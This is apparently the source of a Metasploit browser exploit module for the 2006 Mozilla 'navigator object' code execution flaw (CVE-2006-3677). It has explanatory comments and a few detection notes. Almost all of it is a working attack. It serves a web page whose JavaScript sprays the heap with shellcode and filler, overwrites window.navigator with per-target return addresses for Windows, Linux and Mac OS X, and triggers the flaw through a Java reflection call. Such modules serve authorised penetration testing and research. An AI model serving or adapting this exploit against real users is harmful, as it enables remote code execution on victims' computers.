Path: blob/master/modules/exploits/multi/browser/mozilla_navigatorjava.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for the Mozilla "navigator object" code execution
# flaw (CVE-2006-3677, MFSA 2006-45) in Mozilla Suite, Firefox and
# Thunderbird. The HttpServer::HTML mixin turns the module into a web
# server; every request to the module URI is answered with a page whose
# inline JavaScript overwrites window.navigator and then touches the Java
# plugin (the description states the Java plugin must be installed).
# Per-target values ('Ret', 'Fill') are read from the selected 'Targets'
# entry.
#
# Defensive notes, all taken from generate_html below: the served page
# always carries the literal body text "Please wait...", a body onload
# handler named Exploit(), and two large unescape() arguments made of
# %uXXXX sequences, which makes the content easy to match in proxy or IDS
# logs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Disabled BrowserAutopwn registration, kept verbatim. It would have
  # advertised the module for Firefox 1.5.0-1.5.1 and used a
  # navigator.javaEnabled() call as the vulnerability test.
  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #   :ua_name => HttpClients::FF,
  #   :ua_minver => "1.5.0",
  #   :ua_maxver => "1.5.1",
  #   :javascript => true,
  #   :rank => NormalRanking, # reliable memory corruption
  #   :vuln_test => %Q|
  #     is_vuln = false;
  #     if (navigator.javaEnabled()){
  #       is_vuln = true;
  #     }
  #   |,
  # })

  # Module metadata. Payload space is fixed at 512 bytes with no bad
  # characters. Every target is Firefox 1.5.0.4; they differ only in
  # platform/arch and in the 'Ret' and 'Fill' values consumed by
  # generate_html. The 'Notes' block declares reliability, stability and
  # side effects UNKNOWN, i.e. they have not been assessed.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
          requires the Java plugin to be installed.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm'],
        'References' => [
          ['CVE', '2006-3677'],
          ['OSVDB', '27559'],
          ['BID', '19192'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
        ],
        'Payload' => {
          'Space' => 512,
          'BadChars' => ''
        },
        'Targets' => [
          [
            'Firefox 1.5.0.4 Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x08000800,
              'Fill' => '%u0800'
            }
          ],
          [
            'Firefox 1.5.0.4 Linux x86',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
              'Ret' => -0x58000000,
              'Fill' => '%ua8a8'
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              'Ret' => 0x0c000000,
              'Fill' => '%u0c0c'
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
              'Ret' => 0x1c000000,
              'Fill' => '%u1c1c'
            }
          ],
        ],
        'DisclosureDate' => '2006-07-25',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HttpServer::HTML callback invoked for each request to the module URI.
  #
  # @param cli [Object] the connected client, passed through to the
  #   payload and handler helpers
  # @param _request [Object] the HTTP request; unused, the response does
  #   not depend on it
  # @return [nil]
  def on_request_uri(cli, _request)
    # Re-generate the payload
    # regenerate_payload may return nil; in that case nothing is sent and
    # no handler is started for this client.
    return if ((p = regenerate_payload(cli)).nil?)

    print_status("Sending #{name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

    # Handle the payload
    # The handler is started only after the page has been sent.
    handler(cli)
  end

  # Builds the HTML/JavaScript landing page for the selected target.
  #
  # @param payload [Object] the regenerated payload; only #encoded is read
  # @return [String] the complete HTML document
  #
  # The page's script runs from body onload and, as written below:
  #   1. does nothing unless window.navigator.javaEnabled is truthy (the
  #      property is tested, not called, unlike the disabled autopwn test);
  #   2. decodes the payload from its %u escapes and doubles the target
  #      'Fill' string until it exceeds 0x400000 characters;
  #   3. fills 36 array slots, each built from four 0x100000-character
  #      chunks of fill prefix followed by the payload;
  #   4. overwrites window.navigator with the target 'Ret' value divided by
  #      two (for the Linux target 'Ret' is negative, so the result is
  #      negative; why the value is halved is not documented here);
  #   5. calls java.lang.reflect.Runtime.newInstance inside a try/catch
  #      whose catch block is empty, so any exception is silently dropped.
  def generate_html(payload)
    # Payload bytes rendered as %uXXXX escapes in the target architecture's
    # byte order, matching the unescape() call in the page below.
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    return %|
<html><head>
<script>
function Exploit() {
  if (window.navigator.javaEnabled) {
    var shellcode = unescape("#{enc_code}");
    var b = unescape("#{target['Fill']}");
    while (b.length <= 0x400000) b+=b;

    var c = new Array();
    for (var i =0; i<36; i++) {
      c[i] =
        b.substring(0, 0x100000 - shellcode.length) + shellcode +
        b.substring(0, 0x100000 - shellcode.length) + shellcode +
        b.substring(0, 0x100000 - shellcode.length) + shellcode +
        b.substring(0, 0x100000 - shellcode.length) + shellcode;
    }

    window.navigator = (#{target['Ret']} / 2);
    try {
      java.lang.reflect.Runtime.newInstance(
        java.lang.Class.forName("java.lang.Runtime"), 0
      );
    }catch(e){

    }
  }
}
</script>
</head><body onload='Exploit()'>Please wait...</body></html>
|
  end
end